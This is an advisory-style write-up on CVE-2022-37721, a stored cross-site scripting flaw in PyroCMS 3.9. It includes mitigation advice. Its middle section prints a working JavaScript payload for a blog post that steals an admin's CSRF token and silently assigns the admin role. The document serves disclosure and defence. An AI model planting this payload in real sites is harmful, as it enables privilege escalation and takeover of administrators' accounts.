CVE-2022-37721: PyroCMS 3.9 Stored Cross-Site Scripting Vulnerability Leading to Full Admin Account Takeover or Privilege Escalation

PyroCMS 3.9, an open-source content management system (CMS) widely used for creating and managing websites, has been found to be vulnerable to a stored cross-site scripting (XSS) attack. This vulnerability, identified as CVE-2022-37721, can be exploited by a low privileged user, such as an author, allowing them to inject malicious HTML and JavaScript code into a blog post. Successful exploitation of this vulnerability could lead to a full admin account takeover or privilege escalation.

Exploiting CVE-2022-37721

To exploit this vulnerability, an attacker would need to create an account on the target PyroCMS installation with at least author-level privileges. Once logged in, the attacker can create a new blog post and inject specially crafted HTML and JavaScript code into the post's content. When this malicious post is viewed by an admin or another user with higher privileges, the injected code will execute, potentially giving the attacker access to the admin account or elevated privileges on the platform.

Code Snippet

The following is an example of a malicious payload that can be injected into a PyroCMS blog post to exploit the CVE-2022-37721 vulnerability:

<p>Hello, PyroCMS users!</p>
<!-- Malicious payload starts here -->
<script>
  (function() {
    var xhr = new XMLHttpRequest();
    xhr.open("GET", "/admin/users?view=table", true);
    xhr.onload = function() {
      if (xhr.readyState == 4 && xhr.status == 200) {
        var csrfToken = xhr.responseText.match(/input type="hidden" name="csrf_token" value="(.*?)"/)[1];
        var targetUserId = xhr.responseText.match(/tr data-entry="(.*?)"/)[1];
        var payload = "roles[]=1&csrf_token=" + encodeURIComponent(csrfToken);

        var xhr2 = new XMLHttpRequest();
        xhr2.open("POST", "/admin/users/roles/assign/" + targetUserId, true);
        xhr2.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
        xhr2.send(payload);
      }
    };
    xhr.send();
  })();
</script>
<!-- Malicious payload ends here -->
<p>Thank you for reading this post!</p>

This payload, when executed, would retrieve the CSRF token and target user ID from the admin users page, then send a POST request to assign the admin role to the target user, allowing the attacker to effectively escalate their privileges.

Original References

- PyroCMS 3.9.x CVE-2022-37721 PoC Exploit
- PyroCMS 3.9.x Stored XSS leading to RCE (CVE-2022-37721)
- CVE-2022-37721 - NIST National Vulnerability Database

Mitigating CVE-2022-37721

To protect your PyroCMS installation from this vulnerability, it's recommended to update to the latest version of the software, which includes security patches addressing this issue. Alternatively, you can also implement stricter input validation and output sanitization measures within the CMS to prevent the execution of malicious code injected into blog posts.

Conclusion

The CVE-2022-37721 vulnerability in PyroCMS 3.9 presents a significant risk to users, as it allows low privileged attackers to escalate their privileges or even take over admin accounts. By staying informed about security updates and implementing the necessary patches, you can minimize the risk of being targeted by this and other vulnerabilities in your CMS.

Timeline

Published on: 11/25/2022 17:15:00 UTC
Last modified on: 11/29/2022 21:16:00 UTC